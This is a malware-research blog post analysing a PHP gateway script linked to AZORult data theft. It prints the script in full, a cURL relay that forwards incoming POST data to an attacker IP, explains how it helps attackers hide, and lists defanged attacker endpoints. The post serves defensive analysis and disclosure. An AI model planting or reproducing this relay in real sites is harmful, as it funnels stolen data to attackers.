Evasive Maneuvers in Data Stealing Gateways

  • November 17, 2020
Labs Note

We have already shared examples of many kinds of malware that rely on an external gateway to receive or return data, such as different malware payloads.

During a recent investigation, we came across this example of a PHP script that attackers use for many different purposes. What makes the sample interesting is that alongside this PHP, we also found a few data-stealing scripts indicating that the code might have been used to send sensitive data to the attackers.

<?php
$AZORult2_gate_path = "hxxp://185.212.130.24/az/index.php";
$curl               = curl_init();
curl_setopt($curl, CURLOPT_URL, $AZORult2_gate_path);
curl_setopt($curl, CURLOPT_CONNECTTIMEOUT, 10);
curl_setopt($curl, CURLOPT_TIMEOUT, 600);
curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
curl_setopt($curl, CURLOPT_POST, true);
curl_setopt($curl, CURLOPT_POSTFIELDS, file_get_contents("php://input"));
curl_setopt($curl, CURLOPT_REFERER, $_SERVER['REMOTE_ADDR']);
echo curl_exec($curl);
curl_close($curl);
?>

$AZORult2_gate_path = "hxxp://185.212.130.24/az/index.php";

The variable $AZORult2_gate_path simply sets where the data will be sent. From there, a cURL session is created with specific parameters to send the information over to the attacker through the php://input stream in the CURLOPT_POSTFIELDS.

curl_setopt($curl, CURLOPT_POSTFIELDS, 
file_get_contents("php://input"));

This is one of the techniques attackers use to receive $_POST parameters through the script and, in this case, relay it back to “hxxp://185.212.130.24/az/index.php”.

One important point to note is this script can be used to send data from any external website to a predefined location prior to forwarding it to the attacker, essentially acting like a proxy. This is helpful for the attackers to evade detection and keep their fingerprinting at a minimum after they breach the target.

At the time of the investigation, attackers were using the following hosts as the “end-point” for this infection:

hxxp://185.212.130.78/az/index.php
hxxp://185.212.130.41/amar/index.php
hxxp://185.212.130.24/az/index.php
hxp://176.10.118.154

Bad actors are constantly updating their malware with new techniques and evasive maneuvers. To protect your website and detect malicious behavior, consider employing integrity control checks and security monitoring services on your site.

Cesar Anjos is Sucuri's Malware Researcher who joined the company in 2014. Cesar's main responsibilities include keeping up with the latest malware and writing about it. His professional experience covers over five years in the area. When Cesar isn't researching, he's finding a way to exercise his mind with anything. Connect with him on our Twitter.

Related Tags
Related Categories
You May Also Like